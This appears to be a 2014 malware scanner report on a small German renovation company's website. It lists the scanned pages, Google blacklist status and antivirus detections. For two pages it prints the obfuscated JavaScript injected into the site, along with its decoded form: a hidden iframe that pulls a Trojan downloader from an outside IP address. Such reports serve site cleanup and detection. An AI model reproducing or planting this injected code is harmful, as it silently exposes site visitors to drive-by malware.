Malware Scanner report for marx-oha.com

Malicious/Suspicious/Total urls checked
2/0/10
2 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "marx-oha.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/2/4
2 suspicious iframes found. See details below
Deface / Content modification
OK

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=marx-oha.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.

Scanned pages/files

Request / Server response / Status
http://marx-oha.com/
200 OK
Content-Length: 6986
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function v475aacdb5d314(v475aacdb5d93a){ function v475aacdb5dd17 () {var v475aacdb5e101=16; return v475aacdb5e101;} return(parseInt(v475aacdb5d93a,v475aacdb5dd17()));}function v475aacdb60c12(v475aacdb63ac1){ function v475aacdb6469d () {var v475aacdb64a74=2; return v475aacdb64a74;} var v475aacdb63ec6='';for(v475aacdb642a7=0; v475aacdb642a7<v475aacdb63ac1.length; v475aacdb642a7+=v475aacdb6469d()){ v475aacdb63ec6+=(String.fromCharCode(v475aacdb5d314(v475aacdb63ac1.substr(v475aacdb642a7, v475aacd
... 15 bytes are skipped ...
eturn v475aacdb63ec6;} document.write(v475aacdb60c12('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D633163353463366265313061207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313036353232292B276434653231355C272077696474683D343832206865696768743D323231207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));

Decoded script:


<SCRIPT>window.status='Done';document.write('<iframe name=c1c54c6be10a src=\'http://77.221.133.188/.if/go.html?'+Math.round(Math.random()*106522)+'d4e215\' width=482 height=221 style=\'display: none\'></iframe>')</SCRIPT>

Antivirus reports:

Avast
HTML:Iframe-inf
Ikarus
Trojan-Downloader.HTML.Agent
K7AntiVirus
Riskware
Kaspersky
Trojan-Downloader.JS.Iframe.ys
Microsoft
TrojanDownloader:HTML/Agent.K
NANO-Antivirus
Trojan.Script.Agent.gcfu
VIPRE
Trojan-Clicker.HTML.IFrame (v)
F-Prot
JS/IFrame.A.gen
GData
HTML:Iframe-inf
Commtouch
JS/IFrame.A.gen

Hidden iFrame found.
size: 1x1     style: hidden
src: http://url

<iframe src='http://url' width='1' height='1' style='visibility: hidden;'>

http://marx-oha.com/index.htm
200 OK
Content-Length: 6986
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function v475aacdb5d314(v475aacdb5d93a){ function v475aacdb5dd17 () {var v475aacdb5e101=16; return v475aacdb5e101;} return(parseInt(v475aacdb5d93a,v475aacdb5dd17()));}function v475aacdb60c12(v475aacdb63ac1){ function v475aacdb6469d () {var v475aacdb64a74=2; return v475aacdb64a74;} var v475aacdb63ec6='';for(v475aacdb642a7=0; v475aacdb642a7<v475aacdb63ac1.length; v475aacdb642a7+=v475aacdb6469d()){ v475aacdb63ec6+=(String.fromCharCode(v475aacdb5d314(v475aacdb63ac1.substr(v475aacdb642a7, v475aacd
... 15 bytes are skipped ...
eturn v475aacdb63ec6;} document.write(v475aacdb60c12('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D633163353463366265313061207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313036353232292B276434653231355C272077696474683D343832206865696768743D323231207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));

Decoded script:


<SCRIPT>window.status='Done';document.write('<iframe name=c1c54c6be10a src=\'http://77.221.133.188/.if/go.html?'+Math.round(Math.random()*106522)+'d4e215\' width=482 height=221 style=\'display: none\'></iframe>')</SCRIPT>

Antivirus reports:

Avast
HTML:Iframe-inf
Ikarus
Trojan-Downloader.HTML.Agent
K7AntiVirus
Riskware
Kaspersky
Trojan-Downloader.JS.Iframe.ys
Microsoft
TrojanDownloader:HTML/Agent.K
NANO-Antivirus
Trojan.Script.Agent.gcfu
VIPRE
Trojan-Clicker.HTML.IFrame (v)
F-Prot
JS/IFrame.A.gen
GData
HTML:Iframe-inf
Commtouch
JS/IFrame.A.gen

Hidden iFrame found.
size: 1x1     style: hidden
src: http://url

<iframe src='http://url' width='1' height='1' style='visibility: hidden;'>

http://marx-oha.com/referenzen.htm
200 OK
Content-Length: 5523
Content-Type: text/html
clean
http://marx-oha.com/fliesen.htm
200 OK
Content-Length: 5486
Content-Type: text/html
clean
http://marx-oha.com/sanierung.htm
200 OK
Content-Length: 5493
Content-Type: text/html
clean
http://marx-oha.com/treppenbelaege.htm
200 OK
Content-Length: 5489
Content-Type: text/html
clean
http://marx-oha.com/kontakt.htm
200 OK
Content-Length: 5482
Content-Type: text/html
clean
http://marx-oha.com/test404page.js
404 Not Found
Content-Length: 958
Content-Type: text/html
clean
http://marx-oha.com/fliesen_2.htm
404 Not Found
Content-Length: 958
Content-Type: text/html
clean
http://marx-oha.com/referenzen_2.html
200 OK
Content-Length: 4800
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: marx-oha.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 14 Jul 2014 18:41:10 GMT
Accept-Ranges: bytes
ETag: "786993-1b4a-4f0e1d7763a00"
Server: Apache/2
Content-Length: 6986
Content-Type: text/html
Last-Modified: Sun, 26 Jan 2014 16:11:20 GMT

...6986 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: marx-oha.com
Referer: http://www.google.com/search?q=marx-oha.com

Result:
The result is similar to the first query. There are no suspicious redirects found.